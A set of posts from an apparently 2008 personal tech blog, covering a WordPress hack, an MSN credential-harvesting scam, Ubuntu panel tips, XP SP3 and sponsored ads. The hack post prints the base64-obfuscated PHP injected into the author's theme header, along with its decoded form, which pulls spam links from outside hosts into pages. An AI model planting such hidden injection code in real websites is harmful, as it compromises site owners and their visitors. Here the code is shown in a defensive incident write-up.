The maintenance is now over and everything is in working order. Enjoy the changes.

If you liked this post, buy me a coffee!

You may remember there were posts floating about on the blogosphere earlier this month pertaining to an exploit in Wordpress 2.5 that individuals were using to inject malicious code into Wordpress files which would include spammy links into your page content. I just discovered that I was a victim of such an attack.

The code was placed in my theme’s header file, base64 encoded just as the article said it would be:
eval(base64_decode('ZnVuY3Rpb24gR2V0Q29udGVudCgpCnsKZXJyb3JfcmVwb3J0aW5nKDApOwokbWlycm9ycz1hcnJheSgiaHR0cDovL2xhcnJ5bWFnaWQuY29tL2xpbmtzLmh0bWwiLCAiaHR0cDovL
2xpbmstb3MuZnJlZWhvc3RpYS5jb20vbGlua3MuaHRtbCIsICJodHRwOi8vYmxvZy5ibHVlZmlyZS50di93cC1jb250ZW50L2xpbmtzLmh0bWwiKTsKZm9yZWFjaCgkbWlycm9ycyBhcyAkayA9PiAkdikKIC
AgIHsKICAgIGlmKCRjb250ZW50PWZpbGVfZ2V0X2NvbnRlbnRzKCR2KSkgYnJlYWs7CiAgICB9CmlmICgkY29udGVudD09IiIpe3JldHVybiAiPCEtLSBsaW5rcyBub3QgZm91bmQgLS0+Ijt9CnJldHVybiA
kY29udGVudDsKfQplY2hvIEdldENvbnRlbnQoKTsK'));


When decoded, the above code just so happens to be:
function GetContent() { error_reporting(0); $mirrors=array("http://larrymagid.com/links.html", "http://link-os.freehostia.com/links.html", "http://blog.bluefire.tv/wp-content/links.html"); foreach($mirrors as $k => $v) { if($content=file_get_contents($v)) break; } if ($content==""){return "";} return $content; } echo GetContent();

For the PHP illiterate among you readers, that code basically says to download a bunch of html files from suspicious sites containing spammy links (Viagra, Cialis, etc. among all else) and input them into my blog’s code.

The issue has now been fixed, and apologies to anyone who was affected by the problem.

Carry on.

If you liked this post, buy me a coffee!

WebHostingChoice’s focus is to help their users select the right plan for their website, ranging from small business to e-commerce: WHC has got it covered. They also offer a great learning center, educating users on everything from scams to telling your dedicated servers and colocation apart. There’s also an advanced search tool for those users who want to get into the nitty gritty of it all.

Go ahead and check out WebHostingChoice now - you’ll be sure to save a few dollars.

This is a sponsored post

If you liked this post, buy me a coffee!

Since UXTheme.dll was upgraded, I can no longer use custom themes so I’m stuck with the too-bright XP default which has made me turn down my monitor’s brightness/contrast. Hopefully someone can release an updated patcher soon?

There aren’t many UI updates to be seen, so it seems all SP3’s work went on ‘under the hood’. Anybody else at the bleeding edge of Windows releases using SP3 yet?

If you liked this post, buy me a coffee!

With more than 16 years focused in the Telnet and SSH space, Pragma Systems has achieved a level of technical knowledge and industry experience to rival the leaders of the market. Pragma provides software for Fortune 500 companies like big names such as: Target, Dell, Intel, IBM, NTT, Sony, Motorola and Bank of America.

If such large companies trust Pragma Systems with their connectivity and data, why can’t yours?

If you liked this post, buy me a coffee!

Unlike Windows, your get two panels on your desktop: top and bottom. The majority of the bottom panel is given over to the window selector for your running applications. For most users, this leaves the top relatively empty, apart from the Ubuntu system menus on the left and the date and time on the right. So let’s make use of that space.

Applets

If you right-click on the top panel and select ‘Add to panel’, you’ll be presented with a list of cool panel applets. There’s quite a few to play with, but here’s my pick of applets to add.

System Monitor
This displays helpful information such as CPU, dick or network usage. When it appears it’s just a single black rectangle and a tad short for what it displays, so do the following:

1. Right-click on it and select Preferences
2. Tick the Network and ‘Hard disk’ boxes
3. Set ‘System Monitor Width’ to 60.

Now you should find three nicely spaced graphs for CPU, network and disk usage.

Weather Report
To set this up for Australia (wherever your location may be), right-click on it, select Preferences and under Location, drill down to your state and city. Under General, make sure the temperate unit is set to Celsius. Then click Close, right-click it again and select Update. Left-clicking on the applet will give you a detailed report.

Deskbar
This is one of those cleve utilities you can’t do without. Based on the same principles as Apple’s Spotlight, when clicked on, it will provide an input box — whatever you type will be matched against a command, email contacts, local documentation, dictionary search, internet search and more. You can use it to both find information and open or launch the references it finds. Right-click and select Preferences to expand the list of sources used for searching.

Eyes
This is just a bit of fun and actually a very old application from way back when Unix was something you would only find in server rooms. What does it do? Watch the eyes as they follow your mouse around!

Launchers
You’ll note Ubuntu already provides launchers for Firefox, Evolution and the help system; but you can add your own. To add something from the Ubuntu menus, simply scroll through the menus to your application, then left-click and drag it to the panel. If you want to add a program not in the menu system, first right-click on the desktop, select ‘Create Launcher’, fill our the details and then drag it from the desktop to the panel. You can move and arrange them by either left-clicking or middle button-clicking and dragging them. You can prevent certain launchers from being moved by toggling ‘Lock to panel’ when right-clicking.

Top Tip

Size it up
You don’t have to stick with the default panel sizes Ubuntu provides. On larger monitors the text and icons can be smaller, so enlarging them can help. Simply right-click on a panel and select Properties and then adjust size in pixels. It will happily expand to 120 pixels in height, but you’ll probably find a setting of 30-40 to be more amiable. The top and bottom panel can be sized independently, so you can keep the bottom task window smaller while making your program launchers and applets on the top bar larger.

If you liked this post, buy me a coffee!

Now, onto the second part of this post: my experiences with IPv6. I recently got an IPv6 address through a Sydney broker and have been experimenting with it since. I got my KAME dancing and I’m awaiting an rdns delegation to be able to use vhosts from afraid.org. Anybody else use IPv6?

If you liked this post, buy me a coffee!

These great vector packs are a must have for any designer, so I suggest you go and check out all the eye candy and that Go Media’s vector packs are famous for. Did I mention they’re royalty free vector packs?

If you liked this post, buy me a coffee!

The site in question is pooop.info. You visit that site and enter your details at your own risk, although I highly advise that you do not enter your MSN account details anywhere except the Windows Live Messenger sign-in window.

The message I received looked something like this:

PARTY PARTY PARTY

http://[your friend's email account (the part before the @)].pics.pooop.info

The message other users are receiving may vary, so be vigilant.

So what’s the premise of this latest scam? A user basically voluntarily enters their MSN account details (email AND password) on the proviso they’re going to see their friend’s photos. The site is employing the tactic of a social networking site - sign-up to see your friend’s photos and it seems to be working. What most users don’t realise is that the fine print is spelled out clearly in their terms and conditions - which are linked in perfect sight above the sign-in box on the pooop.info website. Here’s the interesting part, their Terms & Conditions:

By filling out this form, you authorize TST Management, Inc to spread the word
about this 100% real and upcomming Messenger Community Site.
You will receive your share of the credit in helping us spread the word. This is a harmless
Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.
By using our service/website you hereby fully authorize TST Management, Inc to send messages
of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information
you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal
information. Everything we do with your information is disclosed here. If you are under eighteen (18),
you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR
ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT,
DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED
TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination
of the following:
1. Send Instant Messages to your friends promoting this site.
2. Introduce new entertaining sites to your friends via Instant Messages.

This is a free service. You will not be asked to pay at any time.
You will not be subscribed to anything asking for payment.
This service is made possible by many hours of human effort.

Messenger Profiles, Inc reserves the right to change the terms of use / privacy policy
at any time without notice. To view the latest version of this privacy policy,
simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this
agreement and the terms of use you accepted when you signed up with MSN. You also
understand that by temporarily accessing your msn account, Messenger Profiles, Inc
is NOT agreeing to MSN’s terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the Republic of Panama.
You expressly consent to the exclusive venue and personal
jurisdiction of the courts located in the Republic of Panama
for any actions arising from or relating to this agreement.

Copyright 2008 TST Management, Inc

I bolded the interesting part - your account may be accessed to spread the word - I believe it should say ‘your account WILL be accessed’ because that’s exactly what’s happening. You may also notice that the T&Cs are governed by the laws of Panama. I’m pretty sure I wouldn’t give my MSN login details to anyone, especially a site in Panama. But alas, here’s where it gets even more interesting. A whois of the site
reveals the site is actually owned by a group in Hong Kong called Blue China Group, Ltd.

I wanted to see if the site was actually real in it’s claims, so I signed up for a dummy hotmail account… I entered the account details perfectly and what do you know? ‘Login failed’. Where are the photos I was promised? It seems that they’re just harvesting more and more email accounts that most likely be used for spam. They say they’re not a phishing site, and technically they aren’t because the Terms & Conditions plainly state your account will be accessed by TST management (there’s another discrepancy in the company’s details. What ever happened to Panama and the Blue China Group?) but I wish people would just be more careful about what they do with their information.

So spread the word to your friends not to give out their sign-in information to ANYONE, especially pooop.info. Halt the spread of this site and hopefully stop the potentially tens of thousands spam emails that will result from it.

Update: The obvious solution to this problem seems to be to change your account’s password. It seems this harvesting scam is starting to snowball, so be vigilant. Just to reiterate, don’t EVER give out your MSN account’s password. SEE UPDATE #3 BELOW

Update #2: Thanks to the comment of a reader known as ‘d’, another website, srys.info, has been uncovered which is run by the same group of shameless scammers. A whois of the domain yields the same results as the whois of pooop.info. Thanks d!

Update #3: After reading around on the internet, some say this problem is actually a virus (probably a remade version of the ‘Should I put this picture of us on MySpace?’ and then your friend would send you a .zip file). I don’t think it’s a virus at all but I will try to find out. For now, stay vigilant and remind your friends to read this article if they are affected by the problem.

Update #4 (March 26): This article has gotten quite a bit of attention around the internet, including a news story on mess.be. Just an update on the list of sites that you may be linked to include:

rkntbp.info, vnxpkf.info, yzxvsn.info, jcyhzr.info, vnxpkf.info, xrsnbt.info, dytgms.info, qpcbkt.info, yqbzfj.info, yxwzmq.info, psnkcq.info, sxwmkr.info, tqxycj.info, wcmbsj.info, rhqwcp.info, qmnfct.info, rsbkdg.info, zjdgxq.info, mxbpkr.info, xjctsp.info, rhqwcp.info, mgtwdn.info, kfytsj.info, dsbpzg.info, gmnzby.info, dbnyzc.info, jcyhzr.info, dsbpzg.info, dbnyzc.info, bzjnxd.info, zjdgxq.info, qvsgwy.info, cdystp.info, hmybqw.info, yvmjzc.info, vmytks.info, nhcswv.info, ztmrcj.info, wkfbmt.info, fvkgcz.info, zcxrjb.info, jtyqkv.info, xhzsrg.info, hqnxmv.info, srbgxz.info, pghzvq.info, bgpmwr.info, ndkzcy.info, tpyhzx.info, etc…

It seems that most of the info domains now use skaq.info as the main site and are simply just ‘mirroring’ skaq.info (it is the same site just under a different domain). Continue to be wary of such sites.

Update #5 (April 24): So here I am again updating this article because the face of the threat has changed, yet again, in an attempt to trick more users. It seems they’ve started to use more logical domains (as reported by users in the comments) such as imagehosters.info and friendpixer.com. I believe this will catch more users out, so once again I reiterate DO NOT ENTER YOUR ACCOUNT DETAILS ANYWHERE OTHER THAN YOUR MSN CLIENT. I appreciate your updates in the comments on the different sites, etc. Keep them coming! Note some comments are being pushed into the moderation queue as spam - don’t worry, I check these and get them approved as quickly as possible. There is no need to resubmit your comment.

Help to spread the word by Digging this story.

If you liked this post, buy me a coffee!

If you liked this post, buy me a coffee!